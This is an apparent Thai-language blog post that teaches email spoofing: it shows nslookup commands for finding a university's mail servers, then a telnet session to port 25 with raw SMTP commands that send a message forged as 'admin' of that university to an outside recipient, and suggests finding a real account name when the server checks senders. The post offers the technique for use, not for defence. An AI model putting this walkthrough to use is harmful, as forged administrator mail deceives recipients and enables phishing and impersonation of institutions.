การปลอมเมลล์ใครว่าทำยากง่ายนิดเดียวเองอ่ะ เริ่มกันเลย
- เราต้องรู้ก่อนว่าเราจะให้โฮสใหนเป็นตัวส่งเมลล์ให้เรา (mail relay)
cmd> nslookp
cmd> set type=MX
cmd> hostname
เราก็จะได้รายชื่อโฮสเมลล์เซิร์ฟเวอร์
ตัวอย่างหาโฮสที่เป็นเมลล์เซิร์ฟเวอร์ของ somuni.ac.th
C:\Documents and Settings\user>nslookup
Default Server: ns.someuni.ac.th
Address: x.x.x.x
> set type=MX
> someuni.ac.th
Server: ns.someuni.ac.th
Address: x.x.x.x
someuni.ac.th MX preference = 10, mail exchanger = ohuh.somuni.ac.th
someuni.ac.th MX preference = 20, mail exchanger = ohuhmail.someuni.ac.th
someuni.ac.th nameserver = ns.someuni.ac.th
someuni.ac.th nameserver = ns1.someuni.ac.th
ohuh.somuni.ac.th internet address = x.x.x.x
ohuhmail.someuni.ac.th internet address = x.x.x.x
ns.someuni.ac.th internet address = x.x.x.x
ns1.someuni.ac.th internet address = x.x.x.x
>
ได้เครื่องที่จะเป็น เมลล์รีเลย์ให้เราแล้วครับ ohuh.somuni.ac.th หรือ ohuhmail.someuni.ac.th
- เมื่อเราได้เครื่องที่จะส่งเมลล์ให้เราแล้วเราก็เริ่มปลอมกันเลยครับ
telnet ohuhmail.someuni.ac.th 25
จากนั้นเครื่อง ohuhmail.someuni.ac.th จะต้อนรับเรา
ส่วนในการปลอม e-mail โดยการ ใช้คำสั่ง
HELO someone
MAIL FROM: admin@someuni.ac.th
RCPT TO: bilgate@msn.com
DATA
พิมพ์อะไรก็ได้ ถ้าต้องการหยุดให้ใช้ . (จุดฟูลสตอบ)
.
quit
- ชื่ออีเมลล์ที่จะเป็นต้ัวส่งนั้น บางครั้งเมลล์เซิร์ฟเวอร์อาจมีการตรวจสอบว่ามี account นี้จริงมั้ยถ้าไม่มีมันอาจปฏิเสธเราไม่ให้เราส่งก็เป็นได้ วิธีแก้เราก็ต้องหา account ที่มันมีอยู่จริงก็แล้วกันครับ
อันนี้วิธีใครวิธีมันนะครับในการหา account ที่มีอยู่จริงของเมลล์เซิร์ฟเวอร์เครื่องนั้นอ่ะคร้บ
No comments:
Post a Comment